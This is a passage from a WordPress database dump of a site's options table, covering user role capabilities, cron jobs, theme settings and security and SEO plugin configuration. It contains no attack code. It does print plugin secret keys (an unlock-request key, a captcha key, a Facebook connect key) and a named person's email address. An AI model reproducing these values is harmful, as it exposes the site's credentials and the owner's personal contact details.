\";s:6:\"filter\";b:0;}}','yes'),(80,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(81,'uninstall_plugins','a:2:{s:29:\"spam-captcha/spam-captcha.php\";a:2:{i:0;s:12:\"spam_captcha\";i:1;s:20:\"uninstall_removedata\";}s:23:\"wp-cerber/wp-cerber.php\";s:13:\"cerber_finito\";}','no'),(82,'timezone_string','','yes'),(83,'page_for_posts','0','yes'),(84,'page_on_front','0','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','0','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'initial_db_version','37965','yes'),(92,'wp_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:65:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:35:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),(93,'widget_search','a:4:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;i:4;a:0:{}i:5;a:1:{s:5:\"title\";s:25:\"What are you looking for?\";}}','yes'),(94,'widget_recent-posts','a:3:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;i:4;a:3:{s:5:\"title\";s:11:\"Recent News\";s:6:\"number\";i:5;s:9:\"show_date\";b:0;}}','yes'),(95,'widget_recent-comments','a:3:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;i:4;a:0:{}}','yes'),(96,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(98,'sidebars_widgets','a:7:{s:19:\"wp_inactive_widgets\";a:0:{}s:18:\"dw_megamenu_widget\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:13:\"right-sidebar\";a:6:{i:0;s:8:\"search-4\";i:1;s:14:\"recent-posts-4\";i:2;s:6:\"text-5\";i:3;s:17:\"recent-comments-4\";i:4;s:7:\"pages-3\";i:5;s:6:\"text-6\";}s:10:\"footer-one\";a:1:{i:0;s:12:\"categories-5\";}s:10:\"footer-two\";a:1:{i:0;s:6:\"text-4\";}s:12:\"footer-three\";a:1:{i:0;s:8:\"search-5\";}s:13:\"array_version\";i:3;}','yes'),(99,'widget_pages','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:3:{s:5:\"title\";s:12:\"Get In Touch\";s:6:\"sortby\";s:10:\"post_title\";s:7:\"exclude\";s:0:\"\";}}','yes'),(100,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(102,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(103,'cron','a:18:{i:1675209322;a:1:{s:18:\"cerber_bg_launcher\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:8:\"crb_five\";s:4:\"args\";a:0:{}s:8:\"interval\";i:300;}}}i:1675209600;a:1:{s:15:\"cerber_hourly_1\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675209925;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675210200;a:1:{s:15:\"cerber_hourly_2\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675210864;a:1:{s:24:\"aiowps_hourly_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675211251;a:1:{s:21:\"wordfence_ls_ntp_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675211261;a:1:{s:21:\"wordfence_hourly_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675218000;a:1:{s:12:\"cerber_daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675220367;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1675222622;a:1:{s:18:\"wp_https_detection\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1675240590;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675240602;a:1:{s:23:\"aiowps_daily_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675250861;a:1:{s:20:\"wordfence_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675253541;a:1:{s:21:\"ai1wm_storage_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675263386;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675274724;a:2:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675283766;a:1:{s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}s:7:\"version\";i:2;}','yes'),(150,'recently_activated','a:0:{}','yes'),(154,'aiowpsec_db_version','1.9','yes'),(155,'aio_wp_security_configs','a:92:{s:19:\"aiowps_enable_debug\";s:0:\"\";s:36:\"aiowps_remove_wp_generator_meta_info\";s:0:\"\";s:25:\"aiowps_prevent_hotlinking\";s:0:\"\";s:28:\"aiowps_enable_login_lockdown\";s:0:\"\";s:28:\"aiowps_allow_unlock_requests\";s:0:\"\";s:25:\"aiowps_max_login_attempts\";s:1:\"3\";s:24:\"aiowps_retry_time_period\";s:1:\"5\";s:26:\"aiowps_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_set_generic_login_msg\";s:0:\"\";s:26:\"aiowps_enable_email_notify\";s:0:\"\";s:20:\"aiowps_email_address\";s:29:\"zoe.allen@vanillacircus.co.uk\";s:27:\"aiowps_enable_forced_logout\";s:0:\"\";s:25:\"aiowps_logout_time_period\";s:2:\"60\";s:39:\"aiowps_enable_invalid_username_lockdown\";s:0:\"\";s:32:\"aiowps_unlock_request_secret_key\";s:20:\"idg62u4jdigvwyckm8um\";s:26:\"aiowps_enable_whitelisting\";s:0:\"\";s:27:\"aiowps_allowed_ip_addresses\";s:0:\"\";s:27:\"aiowps_enable_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_custom_login_captcha\";s:0:\"\";s:25:\"aiowps_captcha_secret_key\";s:20:\"kivnyaqgn0y5uyb78g7e\";s:42:\"aiowps_enable_manual_registration_approval\";s:0:\"\";s:39:\"aiowps_enable_registration_page_captcha\";s:0:\"\";s:27:\"aiowps_enable_random_prefix\";s:0:\"\";s:31:\"aiowps_enable_automated_backups\";s:0:\"\";s:26:\"aiowps_db_backup_frequency\";s:1:\"4\";s:25:\"aiowps_db_backup_interval\";s:1:\"2\";s:26:\"aiowps_backup_files_stored\";s:1:\"2\";s:32:\"aiowps_send_backup_email_address\";s:0:\"\";s:27:\"aiowps_backup_email_address\";s:29:\"zoe.allen@vanillacircus.co.uk\";s:27:\"aiowps_disable_file_editing\";s:0:\"\";s:37:\"aiowps_prevent_default_wp_file_access\";s:0:\"\";s:22:\"aiowps_system_log_file\";s:9:\"error_log\";s:26:\"aiowps_enable_blacklisting\";s:0:\"\";s:26:\"aiowps_banned_ip_addresses\";s:0:\"\";s:28:\"aiowps_enable_basic_firewall\";s:0:\"\";s:31:\"aiowps_enable_pingback_firewall\";s:0:\"\";s:38:\"aiowps_disable_xmlrpc_pingback_methods\";s:0:\"\";s:34:\"aiowps_block_debug_log_file_access\";s:0:\"\";s:26:\"aiowps_disable_index_views\";s:0:\"\";s:30:\"aiowps_disable_trace_and_track\";s:0:\"\";s:28:\"aiowps_forbid_proxy_comments\";s:0:\"\";s:29:\"aiowps_deny_bad_query_strings\";s:0:\"\";s:34:\"aiowps_advanced_char_string_filter\";s:0:\"\";s:25:\"aiowps_enable_5g_firewall\";s:0:\"\";s:25:\"aiowps_enable_6g_firewall\";s:0:\"\";s:26:\"aiowps_enable_custom_rules\";s:0:\"\";s:19:\"aiowps_custom_rules\";s:0:\"\";s:25:\"aiowps_enable_404_logging\";s:0:\"\";s:28:\"aiowps_enable_404_IP_lockout\";s:0:\"\";s:30:\"aiowps_404_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_404_lock_redirect_url\";s:16:\"http://127.0.0.1\";s:31:\"aiowps_enable_rename_login_page\";s:0:\"\";s:28:\"aiowps_enable_login_honeypot\";s:0:\"\";s:43:\"aiowps_enable_brute_force_attack_prevention\";s:0:\"\";s:30:\"aiowps_brute_force_secret_word\";s:0:\"\";s:24:\"aiowps_cookie_brute_test\";s:0:\"\";s:44:\"aiowps_cookie_based_brute_force_redirect_url\";s:16:\"http://127.0.0.1\";s:59:\"aiowps_brute_force_attack_prevention_pw_protected_exception\";s:0:\"\";s:51:\"aiowps_brute_force_attack_prevention_ajax_exception\";s:0:\"\";s:19:\"aiowps_site_lockout\";s:0:\"\";s:23:\"aiowps_site_lockout_msg\";s:0:\"\";s:30:\"aiowps_enable_spambot_blocking\";s:1:\"1\";s:29:\"aiowps_enable_comment_captcha\";s:1:\"1\";s:31:\"aiowps_enable_autoblock_spam_ip\";s:0:\"\";s:33:\"aiowps_spam_ip_min_comments_block\";s:0:\"\";s:32:\"aiowps_enable_automated_fcd_scan\";s:0:\"\";s:25:\"aiowps_fcd_scan_frequency\";s:1:\"4\";s:24:\"aiowps_fcd_scan_interval\";s:1:\"2\";s:28:\"aiowps_fcd_exclude_filetypes\";s:0:\"\";s:24:\"aiowps_fcd_exclude_files\";s:0:\"\";s:26:\"aiowps_send_fcd_scan_email\";s:0:\"\";s:29:\"aiowps_fcd_scan_email_address\";s:29:\"zoe.allen@vanillacircus.co.uk\";s:27:\"aiowps_fcds_change_detected\";b:0;s:22:\"aiowps_copy_protection\";s:0:\"\";s:40:\"aiowps_prevent_site_display_inside_frame\";s:0:\"\";s:32:\"aiowps_prevent_users_enumeration\";s:0:\"\";s:43:\"aiowps_instantly_lockout_specific_usernames\";a:0:{}s:35:\"aiowps_lockdown_enable_whitelisting\";s:0:\"\";s:36:\"aiowps_lockdown_allowed_ip_addresses\";s:0:\"\";s:31:\"aiowps_enable_woo_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_woo_register_captcha\";s:0:\"\";s:38:\"aiowps_enable_woo_lostpassword_captcha\";s:0:\"\";s:35:\"aiowps_enable_registration_honeypot\";s:0:\"\";s:27:\"aiowps_max_file_upload_size\";s:2:\"10\";s:32:\"aiowps_place_custom_rules_at_top\";s:0:\"\";s:33:\"aiowps_enable_bp_register_captcha\";s:0:\"\";s:35:\"aiowps_enable_bbp_new_topic_captcha\";s:0:\"\";s:42:\"aiowps_disallow_unauthorized_rest_requests\";s:0:\"\";s:25:\"aiowps_ip_retrieve_method\";s:1:\"0\";s:25:\"aiowps_recaptcha_site_key\";s:0:\"\";s:27:\"aiowps_recaptcha_secret_key\";s:0:\"\";s:24:\"aiowps_default_recaptcha\";s:0:\"\";}','yes'),(156,'wpcf7','a:2:{s:7:\"version\";s:3:\"4.5\";s:13:\"bulk_validate\";a:4:{s:9:\"timestamp\";i:1481877402;s:7:\"version\";s:3:\"4.5\";s:11:\"count_valid\";i:1;s:13:\"count_invalid\";i:0;}}','yes'),(157,'loginlockdownAdminOptions','a:6:{s:17:\"max_login_retries\";i:3;s:14:\"retries_within\";i:5;s:14:\"lockout_length\";i:60;s:25:\"lockout_invalid_usernames\";s:2:\"no\";s:17:\"mask_login_errors\";s:2:\"no\";s:16:\"show_credit_link\";s:3:\"yes\";}','yes'),(158,'loginlockdown_db_version','1.0','no'),(159,'spam_captcha_options','a:7:{s:12:\"contactform7\";b:0;s:16:\"hash_sha1_plugin\";s:40:\"79cd738bc0355315f54b8c3d5a2771bb67af39fd\";s:11:\"captcha_css\";s:43:\".captcha_image {\n	\n}\n.captcha_comment {\n	\n}\";s:14:\"captcha_enable\";b:0;s:14:\"flush_nb_jours\";i:30;s:15:\"flush_max_entry\";i:10000;s:14:\"akismet_enable\";b:0;}','yes'),(160,'plugin_error_on_activation','','yes'),(162,'wpseo','a:14:{s:14:\"blocking_files\";a:0:{}s:15:\"ms_defaults_set\";b:0;s:7:\"version\";s:3:\"3.5\";s:12:\"company_logo\";s:0:\"\";s:12:\"company_name\";s:0:\"\";s:17:\"company_or_person\";s:0:\"\";s:20:\"disableadvanced_meta\";b:1;s:19:\"onpage_indexability\";b:1;s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\";s:0:\"\";s:11:\"person_name\";s:0:\"\";s:12:\"website_name\";s:0:\"\";s:22:\"alternate_website_name\";s:0:\"\";s:12:\"yandexverify\";s:0:\"\";}','yes'),(163,'wpseo_permalinks','a:9:{s:15:\"cleanpermalinks\";b:0;s:24:\"cleanpermalink-extravars\";s:0:\"\";s:29:\"cleanpermalink-googlecampaign\";b:0;s:31:\"cleanpermalink-googlesitesearch\";b:0;s:15:\"cleanreplytocom\";b:0;s:10:\"cleanslugs\";b:1;s:18:\"redirectattachment\";b:0;s:17:\"stripcategorybase\";b:0;s:13:\"trailingslash\";b:0;}','yes'),(164,'wpseo_titles','a:56:{s:10:\"title_test\";i:0;s:17:\"forcerewritetitle\";b:0;s:23:\"content-analysis-active\";b:1;s:23:\"keyword-analysis-active\";b:1;s:9:\"separator\";s:7:\"sc-dash\";s:5:\"noodp\";b:0;s:15:\"usemetakeywords\";b:0;s:16:\"title-home-wpseo\";s:42:\"%%sitename%% %%page%% %%sep%% %%sitedesc%%\";s:18:\"title-author-wpseo\";s:41:\"%%name%%, Author at %%sitename%% %%page%%\";s:19:\"title-archive-wpseo\";s:38:\"%%date%% %%page%% %%sep%% %%sitename%%\";s:18:\"title-search-wpseo\";s:63:\"You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%\";s:15:\"title-404-wpseo\";s:35:\"Page not found %%sep%% %%sitename%%\";s:19:\"metadesc-home-wpseo\";s:0:\"\";s:21:\"metadesc-author-wpseo\";s:0:\"\";s:22:\"metadesc-archive-wpseo\";s:0:\"\";s:18:\"metakey-home-wpseo\";s:0:\"\";s:20:\"metakey-author-wpseo\";s:0:\"\";s:22:\"noindex-subpages-wpseo\";b:0;s:20:\"noindex-author-wpseo\";b:0;s:21:\"noindex-archive-wpseo\";b:1;s:14:\"disable-author\";b:0;s:12:\"disable-date\";b:0;s:19:\"disable-post_format\";b:0;s:10:\"title-post\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-post\";s:0:\"\";s:12:\"metakey-post\";s:0:\"\";s:12:\"noindex-post\";b:0;s:13:\"showdate-post\";b:0;s:16:\"hideeditbox-post\";b:0;s:10:\"title-page\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-page\";s:0:\"\";s:12:\"metakey-page\";s:0:\"\";s:12:\"noindex-page\";b:0;s:13:\"showdate-page\";b:0;s:16:\"hideeditbox-page\";b:0;s:16:\"title-attachment\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:19:\"metadesc-attachment\";s:0:\"\";s:18:\"metakey-attachment\";s:0:\"\";s:18:\"noindex-attachment\";b:0;s:19:\"showdate-attachment\";b:0;s:22:\"hideeditbox-attachment\";b:0;s:18:\"title-tax-category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-category\";s:0:\"\";s:20:\"metakey-tax-category\";s:0:\"\";s:24:\"hideeditbox-tax-category\";b:0;s:20:\"noindex-tax-category\";b:0;s:18:\"title-tax-post_tag\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-post_tag\";s:0:\"\";s:20:\"metakey-tax-post_tag\";s:0:\"\";s:24:\"hideeditbox-tax-post_tag\";b:0;s:20:\"noindex-tax-post_tag\";b:0;s:21:\"title-tax-post_format\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:24:\"metadesc-tax-post_format\";s:0:\"\";s:23:\"metakey-tax-post_format\";s:0:\"\";s:27:\"hideeditbox-tax-post_format\";b:0;s:23:\"noindex-tax-post_format\";b:1;}','yes'),(165,'wpseo_social','a:20:{s:9:\"fb_admins\";a:0:{}s:12:\"fbconnectkey\";s:32:\"685eb3ae8ef5363f2873083bc96a87e1\";s:13:\"facebook_site\";s:0:\"\";s:13:\"instagram_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:11:\"myspace_url\";s:0:\"\";s:16:\"og_default_image\";s:0:\"\";s:18:\"og_frontpage_title\";s:0:\"\";s:17:\"og_frontpage_desc\";s:0:\"\";s:18:\"og_frontpage_image\";s:0:\"\";s:9:\"opengraph\";b:1;s:13:\"pinterest_url\";s:0:\"\";s:15:\"pinterestverify\";s:0:\"\";s:14:\"plus-publisher\";s:0:\"\";s:7:\"twitter\";b:1;s:12:\"twitter_site\";s:0:\"\";s:17:\"twitter_card_type\";s:7:\"summary\";s:11:\"youtube_url\";s:0:\"\";s:15:\"google_plus_url\";s:0:\"\";s:10:\"fbadminapp\";s:0:\"\";}','yes'),(166,'wpseo_rss','a:2:{s:9:\"rssbefore\";s:0:\"\";s:8:\"rssafter\";s:53:\"The post %%POSTLINK%% appeared first on %%BLOGLINK%%.\";}','yes'),(167,'wpseo_internallinks','a:10:{s:20:\"breadcrumbs-404crumb\";s:25:\"Error 404: Page not found\";s:23:\"breadcrumbs-blog-remove\";b:0;s:20:\"breadcrumbs-boldlast\";b:0;s:25:\"breadcrumbs-archiveprefix\";s:12:\"Archives for\";s:18:\"breadcrumbs-enable\";b:0;s:16:\"breadcrumbs-home\";s:4:\"Home\";s:18:\"breadcrumbs-prefix\";s:0:\"\";s:24:\"breadcrumbs-searchprefix\";s:16:\"You searched for\";s:15:\"breadcrumbs-sep\";s:7:\"&raquo;\";s:23:\"post_types-post-maintax\";i:0;}','yes'),(168,'wpseo_xml','a:16:{s:22:\"disable_author_sitemap\";b:1;s:22:\"disable_author_noposts\";b:1;s:16:\"enablexmlsitemap\";b:1;s:16:\"entries-per-page\";i:1000;s:14:\"excluded-posts\";s:0:\"\";s:38:\"user_role-administrator-not_in_sitemap\";b:0;s:31:\"user_role-editor-not_in_sitemap\";b:0;s:31:\"user_role-author-not_in_sitemap\";b:0;s:36:\"user_role-contributor-not_in_sitemap\";b:0;s:35:\"user_role-subscriber-not_in_sitemap\";b:0;s:30:\"post_types-post-not_in_sitemap\";b:0;s:30:\"post_types-page-not_in_sitemap\";b:0;s:36:\"post_types-attachment-not_in_sitemap\";b:1;s:34:\"taxonomies-category-not_in_sitemap\";b:0;s:34:\"taxonomies-post_tag-not_in_sitemap\";b:0;s:37:\"taxonomies-post_format-not_in_sitemap\";b:0;}','yes'),(169,'wpseo_flush_rewrite','1','yes'),(173,'coreSLframework_options','a:1:{s:22:\"global_location_plugin\";a:4:{i:0;a:2:{i:0;s:9:\"*Standard\";i:1;s:3:\"std\";}i:1;a:2:{i:0;s:13:\"under Plugins\";i:1;s:7:\"plugins\";}i:2;a:2:{i:0;s:11:\"under Tools\";i:1;s:5:\"tools\";}i:3;a:2:{i:0;s:14:\"under Settings\";i:1;s:8:\"settings\";}}}','yes'),(174,'fw_active_extensions','a:6:{s:6:\"update\";a:0:{}s:13:\"github-update\";a:0:{}s:4:\"blog\";a:0:{}s:10:\"shortcodes\";a:0:{}s:13:\"wp-shortcodes\";a:0:{}s:7:\"builder\";a:0:{}}','yes'),(177,'universal_google_analytics_tracking_id','UA-89128314-1','yes'),(194,'wpseo_sitemap_1_cache_validator','51JfE','no'),(195,'wpseo_sitemap_wpcf7_contact_form_cache_validator','4PxZU','no'),(196,'wpseo_sitemap_revision_cache_validator','3rRzQ','no'),(197,'wpseo_sitemap_page_cache_validator','3rRxQ','no'),(201,'wpseo_sitemap_cache_validator_global','6GB3A','no'),(204,'wpseo_sitemap_post_cache_validator','51JfP','no'),(207,'wpseo_sitemap_category_cache_validator','51juS','no'),(216,'theme_mods_twentysixteen','a:1:{s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1481900143;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}}}}','yes'),(217,'current_theme','The Minimal','yes'),(218,'theme_mods_the-minimal','a:5:{i:0;b:0;s:21:\"the_minimal_ed_slider\";b:1;s:22:\"the_minimal_slider_cat\";s:1:\"2\";s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:6;}s:18:\"custom_css_post_id\";i:-1;}','yes'),(219,'theme_switched','','yes'),(220,'widget_the_minimal_featured_post','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(221,'widget_the_minimal_recent_post','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(222,'widget_the_minimal_popular_post','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(223,'widget_the_minimal_social_links','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(224,'wpseo_sitemap_attachment_cache_validator','3rPnE','no'),(237,'wpseo_sitemap_13_cache_validator','4TWbt','no'),(239,'category_children','a:0:{}','yes'),(240,'wpseo_sitemap_16_cache_validator','4UqLr','no'),(293,'wp-date-remover','a:4:{s:10:\"removedt_2\";i:1;s:10:\"removedt_3\";i:1;s:10:\"removedt_4\";i:1;s:10:\"removedt_5\";i:1;}','yes'),(302,'nav_menu_options','a:1:{s:8:\"auto_add\";a:1:{i:0;i:6;}}','yes'),(303,'wpseo_sitemap_nav_menu_cache_validator','3seru','no'),(304,'wpseo_sitemap_nav_menu_item_cache_validator','3sest','no'),(2483,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:29:\"zoe.allen@vanillacircus.co.uk\";s:7:\"version\";s:5:\"5.9.5\";s:9:\"timestamp\";i:1666047588;}','no'),(4613,'wpseo_sitemap_author_cache_validator','5pgGm','no'),(6819,'db_upgraded','','yes'),(15966,'fresh_site','0','yes'),(52486,'WPLANG','','yes'),(61534,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(61535,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(61536,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i: